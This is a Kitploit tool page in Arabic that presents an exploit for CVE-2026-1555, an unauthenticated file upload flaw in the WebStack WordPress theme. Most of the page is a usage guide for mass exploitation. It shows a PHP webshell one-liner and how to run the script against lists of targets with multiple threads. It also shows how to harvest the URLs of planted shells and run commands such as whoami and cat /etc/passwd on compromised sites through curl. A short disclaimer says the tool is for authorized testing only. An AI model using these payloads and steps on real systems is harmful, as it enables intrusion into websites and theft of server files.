Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1555 — WebStack <= 1.2024 - رفع ملفات تعسفي بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-1555
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubnxploited/cve-2026-1555

CVE-2026-1555

WebStack <= 1.2024 - رفع ملفات تعسفي بدون مصادقة

عرض المستودع
915منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1555

WebStack <= 1.2024 - رفع ملفات تعسفي بدون مصادقة

👤 بواسطة: Nxploited

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


💀 CVE-2026-1555 — رفع ملفات تعسفي في WebStack لـ WordPress

تنفيذ كود عن بُعد بدون مصادقة عبر معالج AJAX img_upload

Python CVE CVSS

Auth

📌 نظرة عامة على الثغرة

الحقلالتفاصيل
معرّف CVECVE-2026-1555
المكوّن المتأثرقالب WebStack لـ WordPress
الإصدارات المتأثرةجميع الإصدارات حتى 1.2024 وما يشمله
نوع الثغرةرفع ملفات تعسفي ← تنفيذ كود عن بُعد
المصادقة المطلوبة❌ لا شيء (بدون مصادقة)
درجة CVSS9.8 CRITICAL
ناقل CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence

🔬 السبب الجذري التقني

الدالة io_img_upload() المسجَّلة تحت خطاف الإجراء img_upload في ملف admin-ajax.php الخاص بـ WordPress لا تُجري أي تحقق من نوع الملف أو امتداده قبل كتابة الملف المرفوع على الخادم. وبما أن الإجراء مسجَّل دون فحوصات مصادقة (wp_ajax_nopriv_)، يمكن لأي مهاجم بعيد بدون مصادقة إرسال ملف تعسفي — بما في ذلك قشرة ويب PHP — وسيقوم الخادم بتخزينه في مسار متاح للعموم، مما يتيح تنفيذ كود عن بُعد مباشرًا.

نقطة الوصول المُعرَّضة:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>

⚙️ ميزات الأداة

  • 🔁 فحص متعدد الخيوط مع عدد عمال قابل للتهيئة
  • 📋 دعم معالجة أهداف متعددة دفعةً واحدة عبر ملف قائمة أهداف
  • 📤 استخراج تلقائي لرابط القشرة من استجابة JSON
  • 💾 حفظ روابط القشرة الناجحة في uploaded_paths.txt
  • 🎨 واجهة طرفية غنية مع تتبع مباشر للتقدم
  • 🔕 تعطيل التحقق من SSL لتحقيق أقصى توافق

📦 المتطلبات

إصدار Python: 3.8+

ثبّت التبعيات:

root@kitploit:~
pip install requests rich urllib3

🚀 طريقة الاستخدام

1. جهّز قائمة الأهداف

أنشئ ملفًا باسم list.txt (أو أي اسم تفضّله) بحيث يحتوي على هدف واحد في كل سطر:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

الأهداف التي لا تحتوي على http:// أو https:// تُسبَق تلقائيًا بـ http://.

2. جهّز الحمولة

ضع قشرة الويب في نفس المجلد الذي يحتوي السكربت. مثال:

root@kitploit:~
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

3. شغّل الأداة

root@kitploit:~
python CVE-2026-1555.py

سيُطلب منك إدخال:

المُطالبةالوصفالافتراضي
Targets fileالمسار إلى قائمة الأهداف لديكlist.txt
Threadsعدد العمال المتزامنين6
Local file to uploadاسم ملف الحمولة (في مجلد السكربت)shell.php

📤 المخرجات واستخراج القشرة

المخرجات المباشرة

كل عملية رفع ناجحة تطبع:

root@kitploit:~
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful                              │
│                                                │
│ Target:    https://target.com                  │
│ Shell URL: https://target.com/wp-content/...   │
╰────────────────────────────────────────────────╯

النتائج المحفوظة

تُضاف جميع روابط القشرة الناجحة إلى:

root@kitploit:~
uploaded_paths.txt

الوصول إلى قشرتك

بعد رفع ناجح، يمكنك الوصول إلى القشرة مباشرة عبر المتصفح أو curl:

root@kitploit:~
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"

يُستخرج مسار الرفع الدقيق من استجابة JSON الخاصة بالخادم (data.src) ويُطبع تلقائيًا.

التحقق الجماعي من القشور

تحقق سريعًا من جميع القشور المرفوعة من ملف المخرجات:

root@kitploit:~
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt

📊 ملخص المخرجات

في نهاية كل تشغيل، يُطبع ملخص:

root@kitploit:~
Summary  50/50  OK: 12  FAIL: 38
╭──────────────────────────────────────────╮
│  Shell URLs saved to uploaded_paths.txt  │
╰──────────────────────────────────────────╯

🗂️ بنية الملفات

root@kitploit:~
CVE-2026-1555.py       ← Main exploit script
list.txt               ← Target URLs (one per line)
shell.php              ← Payload to upload
uploaded_paths.txt     ← Auto-generated: successful shell URLs

⚠️ إخلاء المسؤولية

هذه الأداة مُقدَّمة حصريًا لاختبار الاختراق المصرح به والبحث الأمني والأغراض التعليمية فقط.

المؤلف — Nxploited — لا يتحمل أي مسؤولية عن أي إساءة استخدام أو ضرر أو نشاط غير قانوني يتم تنفيذه باستخدام هذه الأداة. باستخدامك لهذه الأداة، فإنك تؤكد أن لديك إذنًا كتابيًا صريحًا لاختبار جميع الأنظمة المستهدفة.

الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وقد يؤدي إلى الملاحقة الجنائية بموجب قوانين الجرائم الإلكترونية المعمول بها.

استخدمها بمسؤولية. أنت وحدك المسؤول عن أفعالك.


👤 المؤلف: Nxploited 📣 القناة: Nxploited ZeroDay Hub 💬 تيليجرام: @KNxploited

تنزيل الأداة